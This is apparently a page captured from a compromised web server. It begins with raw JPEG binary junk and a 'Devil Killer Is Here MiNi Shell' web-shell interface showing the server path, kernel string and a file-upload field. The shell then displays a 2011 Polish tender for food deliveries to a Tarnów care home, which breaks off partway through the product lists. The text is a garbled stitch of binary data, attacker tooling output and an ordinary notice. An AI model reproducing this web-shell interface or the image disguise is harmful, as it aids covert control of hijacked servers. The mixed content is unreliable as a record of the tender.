JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110111/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110111/12269-N-2011.html

<p class="kh_header"><b>Tarnów: Dostawa żywności dla potrzeb zbiorowego żywienia osób przebywajacych w DPS.</b><br>
<b>Numer ogłoszenia: 12269 - 2011; data zamieszczenia: 11.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej dla Osób Przewlekle Somatycznie Chorych im. świętego Brata Alberta w Tarnowie , ul. Szpitalna 53, 33-100 Tarnów, woj. małopolskie, tel. 0-14 6888-667, 6888-668, faks 0-14 6888-666.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dps.okay.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa Gminy Mista Tarnowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa żywności dla potrzeb zbiorowego żywienia osób przebywajacych w DPS..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa  żywności dla potrzeb zbiorowego żywienia osób przebywających w DPS.
Symbol dostaw wg Wspólnego Słownika Zamówień: 
wg CPV:03142500, 03212000, 03221100, 03221200, 03221300, 03222110, 03222300, 15100000, 15200000, 15331400, 15332100, 15500000, 15600000, 15810000.
W celu umożliwienia  składania ofert częściowych Zamawiający ustalił niżej wymienione zadania:
                  	

Podział	CPV	Nazwa zadania
Zadanie nr 1	15600000	Produkty przemiału ziarna, skrobi i produktów skrobiowych
Zadanie nr 2	15810000	Pieczywo, świeże wyroby piekarskie i cukiernicze
Zadanie nr 3	15800000	Różne produkty spożywcze
Zadanie nr 4	15331400, 15332100	Warzywa konserwowe i/lub puszkowane; przetworzone      owoce
Zadanie nr 5	15500000	Produkty mleczarskie
Zadanie nr 6	15100000	Produkty zwierzęce, mięso i produkty mięsne
Zadanie nr 7	15100000	Produkty zwierzęce, mięso i produkty mięsne
Zadanie nr 8	15200000	Ryby przetworzone i konserwowe
Zadanie nr 9	03212000,03221100, 03221200,03221300, 03222110, 03222300	Ziemniaki; warzywa korzeniowe i bulwiaste; warzywa owocowe; warzywa liściaste; owoce tropikalne; owoce inne niż tropikalne
Zadanie nr 10	03142500	Jajka

Definicje:
-  Mąki i kasze- produkty suche, niezawilgocone, bez obecności szkodników/chrząszcze, larwy motyli/, opakowania nieuszkodzone. Opakowania jednostkowe 1 kg. Termin ważności w dniu dostawy minimum 2 miesiące. Wykonawca odpowiada za  odpowiednie warunki transportu.
-Pieczywo świeże-wyroby o odpowiedniej barwie charakterystycznej dla
   upieczonego pieczywa,  kształcie, smaku i wymaganej gramaturze. Zachowane odpowiednie warunki transportu. Do każdej dostawy należy dołączyć wykaz zawierający rodzaj pieczywa, wagę, skład surowcowy i datę przydatności do spożycia.
-  Przyprawy i używki-produkty suche, niezawilgocone, opakowania nieuszkodzone. Termin ważności w dniu dostawy minimum 2 miesiące. Zachowane odpowiednie warunki transportu.
-  Pozostałe produkty spożywcze- opakowania produktów, czyste, nieuszkodzone, bez oznak bombażu. Zachowane terminy ważności i odpowiednie warunki transportu.
-  Mleko i produkty mleczarskie- wyroby świeże o odpowiednim smaku i zapachu. Opakowania czyste nieuszkodzone. Zachowana wymagana gramatura, terminy ważności i odpowiednie warunki transportu.
-  Drób i podroby świeże- produkty o odpowiednim zapachu mięsa świeżego, bez zanieczyszczeń, nalotu pleśni i zazielenienia mięsa. Zachowane odpowiednie warunki transportu.
-  Mięso, wędliny i wyroby drobiowe świeże -produkty o odpowiednim naturalnym zapachu mięsa świeżego, bez zanieczyszczeń, nalotu pleśni i zazielenienia mięsa. Zachowane odpowiednie warunki transportu.
-  Ryby i produkty rybne- wyroby mrożone w odpowiednich opakowaniach. Wyroby w puszkach bez oznak bombażu o odpowiednim terminie ważności i odpowiednich warunkach transportu.
-  Warzywa i owoce-produkty świeże(w okresie sezonowym) dojrzałe, czyste, nieuszkodzone. Bez  oznak pleśni, zepsucia i zanieczyszczeń. Zachowane odpowiednie warunki transportu.
-  Jaja świeże -klasa A , rozmiar L, gramatura 63-73 g o podłużnym kształcie, czyste, nieuszkodzone. O odpowiednim terminie ważności nie krótszym niż 14 dni i odpowiednich warunkach transportu.
Jakość dostarczanego towaru powinna odpowiadać ogólnie przyjętym normom  w tym zakresie z zastrzeżeniem art. 357 ustawy Kodeks Cywilny.
Zarówno przedmiot jak i zakres zamówienia określony jest w Specyfikacji Istotnych Warunków Zamówienia w postaci Formularza Cenowego (załącznik nr 1do nr 10 do siwz), który określa  roczne potrzeby asortymentowo - ilościowe  Zamawiającego.
Zamawiający nie jest zobowiązany do zamówienia  podanych w załączniku  ilości. 
Ilość ta będzie wynikać z rzeczywistych potrzeb Zamawiającego w okresie obowiązywania umowy. 
Dostawy przedmiotu zamówienia w poszczególnych okresach czasu muszą być realizowane   wg. odrębnych zamówień dokonywanych przez Zamawiającego telefonicznie, fax lub e-mail   na jeden dzień roboczy przed planowaną dostawą.
Terminarz dostaw:
Dostawy towarów poszczególnych zadań muszą odbywać się w wyznaczonych godzinach. 
Zadanie nr 1 - Produkty przemiału ziarna, skrobi i produktów skrobiowych  -dostawy 2 razy                 w tygodniu tj wtorek, czwartek w godz.700-1000
Zadanie nr 2 - Pieczywo, świeże wyroby piekarskie i cukiernicze	-dostawy 6 razy w tygodniu (od poniedziałku do soboty) w godz.7-730
Zadanie nr 3 - Różne produkty spożywcze	-dostawy 2 razy w tygodniu tj. wtorek, czwartek                       w godz.700-1000
Zadanie nr 4 - Warzywa konserwowe i/lub puszkowane; przetworzone owoce -dostawy  2 razy               w tygodniu tj. wtorek, czwartek w godz.700-1000
Zadanie nr 5 - Produkty mleczarskie -dostawy 6 razy w tygodniu (od poniedziałku do soboty)               w godz.700-730
Zadanie nr 6 - Produkty zwierzęce, mięso i produkty mięsne -dostawy 3 razy w tygodniu tj. poniedziałek, środa, piątek  w godz.700-1000
Zadanie nr 7 - Produkty zwierzęce, mięso i produkty mięsne -dostawy 3 razy w tygodniu  tj. poniedziałek, środa, piątek w godz.700-1000	
Zadanie nr 8 - Ryby przetworzone i konserwowe	-dostawy 2 razy w tygodniu tj. wtorek, czwartek                     w godz.700-1000
Zadanie nr 9  - Ziemniaki; warzywa korzeniowe i bulwiaste; warzywa owocowe; warzywa liściaste; owoce tropikalne; owoce inne niż tropikalne -dostawy 3 razy w tygodniu tj. poniedziałek, środa, piątek w godz.700-1000	
Zadanie nr 10 - Jajka -dostawy 2 razy w tygodniu tj. wtorek, czwartek   w godz.700-1000	
Dostawy żywności muszą być realizowane przez Wykonawcę przystosowanym do tego celu transportem i w opakowaniach Wykonawcy do magazynu Zamawiającego. 
Zwrotne opakowania winny być oznakowane przez Wykonawcę.
Opakowania transportowe środków spożywczych powinny być wykonane z materiałów, które nie powodują zmiany cech organoleptycznych środków spożywczych, są łatwe do utrzymania w czystości oraz zapewniają środkom spożywczym odpowiednie warunki   w czasie przewozu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-4, 15.81.00.00-9, 15.80.00.00-6, 15.33.14.00-1, 15.33.21.00-5, 15.50.00.00-3, 15.10.00.00-9, 15.20.00.00-0, 03.14.25.00-3, 03.21.12.00-1, 03.22.11.00-7, 03.22.12.00-8, 03.22.13.00-9, 03.22.21.10-7, 03.22.23.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 11.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tych warunków nastąpi poprzez komisyjne porównanie oferty       z wymaganiami w siwz i odnotowaniem w protokole z postępowania czy oferta spełnia lub nie spełnia wymagania siwz. Potwierdzeniem spełnienia będą :dokumenty określone w p.VI SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie ma wymagania</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie ma wymagania</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty niezbędne do zawarcia umowy tj. kserokopia wpisu z rejestru części potwierdzającej umocowanie osób do reprezentowania Wykonawcy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>zmiany cen wynikającej z ustawowej zmiany stawki podatku VAT wprowadzonej po dniu zawarcia umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dps.okay.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiajacego p. 23.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.01.2011 godzina 12:00, miejsce: w siedzibie Zamawiajacego p. 23.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Produkty przemiału ziarna, skrobi i produktów skrobiowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa produktu	Jm.	Maksymalna ilość do
1	Kasza gryczana	Kg 	82
2	Kasza gryczana  (100g x 4)	Kg 	5
3	Kasza jęczmienna	kg.	250
4	Kasza jęczmienna (100g x 4)	Kg 	5
5	Kasza manna	Kg 	80
6	Mąka kartoflana	kg.	100
7	Mąka krupczatka	kg.	45
8	Mąka pszenna  poznańska typ.500	kg.	1 400
9	Płatki kukurydziane 1000g	kg.	75
10	Płatki owsiane	kg.	220
11	Płatki zbożowe z miodem 250g	Kg 	42
12	Ryż  (100g x 4)	kg.	58
13	Ryż brązowy 	Kg 	85
14	Ryż biały długoziarnisty  parboiled	kg.	415.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 11.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pieczywo, świeże wyroby piekarskie i cukiernicze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa produktu	Jm.	Maksymalna ilość do
1	Bułka tarta	kg.	165
2	Chałka drożdżowa 0,50kg	kg.	250
3	Chleb graham 0,80kg 	Szt.	3 030
4	Chleb pszenno-żytni 1,20kg 	Szt.	3 850
5	Chleb pszenny  1,20kg 	Szt.	3 120
6	Ciastka kruche mieszane na wagę	Kg 	15
7	Ciastka przekładane z masą na wagę	Kg 	15
8	Drożdżówka z kakao 100g	Szt.	460
9	Drożdżówki z ciasta francuskiego               z serem100g	Szt 	830
10	Drożdżówki z serem 100g	Szt.	1 160
11	Groszek ptysiowy	Kg 	1
12	Murzynek z polewą czekoladową	Kg 	50
13	Pączki z marmoladą100g	Szt.	350
14	Rogale z masą czekoladową 100g	Szt 	660
15	Rogale z konfiturą z róży 100g	Szt 	580
16	Weki 0,4 kg   	Szt. 	5 500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 11.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Różne produkty spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa produktu	Jm.	Maksymalna ilość do
1	Bazylia w proszku 10g	Szt	20
2	Budyń  b/cukru	Kg 	50
3	Bulion drob. w  kostkach 10g	Szt	1 820
4	Cukier biały kryształ kt.2	kg.	3 220
5	Cukier puder	kg.	125
6	Cukier waniliowy 32g	Szt.	420
7	Cynamon 20g	Szt.	42
8	Czekolada 0% cukru 80g	Szt.	90
9	Czekolada mleczna 100g	Szt.	270
10	Drożdże w kostkach 	kg.	9
11	Gałka muszkatołowa mielona 20g	Szt.	30
12	Grzyby suszone -podgrzybek, mieszane	kg.	5
13	Herbata ekspresowa w torebkach 100szt  równoważna jak herbata Lipton	op.	5
14	Herbata czarna granulowana  równoważna jak herbata Saga	kg.	90
15	Imbir  mielony 15g	Szt.	40
16	Kakao ekstra ciemne 	kg.	17
17	Kawa rozpuszczalna 2g	Szt	200
18	Kawa rozpuszczalna (3 w 1) 18g	Szt	200
19	Kawa mielona naturalna 250g	Kg 	2
20	Kawa zbożowa rozpuszczalna150g	kg.	17
21	Keczup 450g łagodny	Kg 	92
22	Kisiel b/cukru	Kg 	42
23	Kminek 20g	Szt.	75
24	Przyprawa do potraw równoważna jak przyprawa VEGA bez glutaminianu sodu	kg.	156
25	Kukurydza konserwowa 400g	Szt	120
26	Kwasek cytrynowy 50g	Szt.	230
27	Liść laurowy 10 g	Szt.	132
28	Przyprawa w płynie do zup równoważna jak przyprawa Winiary	L	390
29	Majeranek 10g	Szt.	82
30	Majonez 	kg.	190
31	Majonez light (niskotłuszczowy)250g	Kg 	66
32	Mak 	kg.	8
33	Makaron z mąki makaronowej pszennej równoważny jak makaron Lubelski.	kg.	680
34	Miód naturalny 25g	Szt	3 800
35	Masa krówkowa w puszce 400g	Szt	10
36	Musztarda	kg.	100
37	Ocet spirytusowy 0,50 l  10%	L	50
38	Oregano w proszku 10g	Szt	20
39	Papryka mielona słodka 20g	Szt.	340
40	Pieprz czarny mielony 20g	Szt.	430
41	Proszek do pieczenia 36g	Szt.	83
42	Przyprawa curry 20g	Szt 	30
43	Przyprawa do drobiu 20g	Szt.	50
44	Przyprawa do ryb 25g	Szt 	45
45	Soki owocowe 2 litrowe w kartonach	Szt	50
46	Sok pomarańczowy 100% w kartoniku 200ml	Szt 	1 050
47	Sól czosnkowa 40g	Szt.	330
48	Sól jodowana	kg.	190
49	Suchary 290g	op.	15
50	Susz owocowy .	kg.	5
51	Tzatziki  przyprawa 20g	Szt	10
52	Śliwki kalifornijskie wędzone	kg.	3
53	Woda mineralna 1,5l gazowana	Szt 	90
54	Ziele angielskie 15g	Szt.	83.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 11.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Warzywa konserwowane i/lub puszkowane, przetworzone owoce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa produktu	Jm.	Maksymalna ilość do
1	Aromaty do ciast 10g	Szt.	100
2	Bita śmietana w proszku 55g	Szt.	410
3	Chrzan tarty 180g równoważny jak chrzan     Polonaise 	Kg 	74
4	Dżem bez cukru słodzony fruktozą 220g	Kg 	66
5	Dżem owocowy 25g	Szt	2 050
6	Dżem  niskosłodzony 280g	Kg 	83
7	Fasola szparagowa mrożona	kg.	165
8	Galaretka owocowa 	Kg 	193
9	Groszek konserwowy 400g	Szt	430
10	Kalafior mrożony	kg.	495
11	Kompot owocowy 0,9l z czarnej porzeczki lub wiśni	Szt.	2 640
12	Koncentrat pomidorowy 30% równoważny jak koncentrat Pudliszki.	kg.	165
13	Marmolada wieloowocowa twarda	kg.	15
14	Ogórki konserwowe 0,9l	Szt	430
15	Olej z pierwszego tłoczenia równoważny jak olej Kujawski.	l.	340
16	Papryka konserwowa 0,9l	Szt	207
17	Pasztet drobiowy  kremowy 131g	Szt.	1 980
18	Pieczarki konserwowe 0,8l	Szt	128
19	Rodzynki	kg.	10
20	Szynka drobiowa mielona 110g	Szt.	1 740
21	Szynka wieprzowa mielona 120 g	Szt.	740
22	Żelatyna 50g	Kg 	15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.14.00-1, 15.33.21.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 11.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa produktu	Jm.	Maksymalna ilość do
1	Jogurt naturalny 150g	Szt.	2 900
2	Jogurt owocowy 150g	Szt.	6 140
3	Kefir 250 ml	Szt.	800
4	Margaryna do pieczenia i smażenia równoważna jak Palma Murzynek 250g 	kg.	570
5	Masło ekstra świeże 200g zaw.tł . 82% ze śmietanki- bez dodatku tłuszczu roślinnego.	kg.	1 100
6	Mleko 2% w op. 10L i 0,9l	L	19 250
7	Ser biały półtłusty krajanka	kg.	780
8	Ser biały tłusty krajanka	kg.	780
9	Ser homogenizowany 150g	Szt.	3 760
10	Ser topiony 100g	Szt.	1 010
11	Ser topiony typu Hochland-trójkątny 25g	Szt	2 930
12	Ser żółty gouda wędzony	kg.	74
13	Ser żółty gouda	kg.	165
14	Serek typu bieluch 150g	Szt.	1 320
15	Serek typu ostrowia 120g	Szt.	2 250
16	Śmietana 18%  w kubkach plastikowych	kg.	706
17	Śmietana kremowa 30%	kg.	30
18	Twarożek ziarnisty 200g	Szt.	4 820.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 11.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Produkty zwierzęce, mięso i produkty mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa produktu	Jm.	Maksymalna ilość do
1	Filet z indyka świeży z mięśnia piersiowego, bez skóry, przerostów tłuszczowych, powierzchnia niezakrwawiona, niepostrzępiona. Barwa mięśni jasnoróżowa.	kg.	520
2	Filet z kurczaka szacowany świeży cała lub połowa piersi bez skóry, przerostów tłuszczowych, powierzchnia niezakrwawiona,  niepostrzępiona. Barwa mięśni jasnoróżowa.	kg.	520
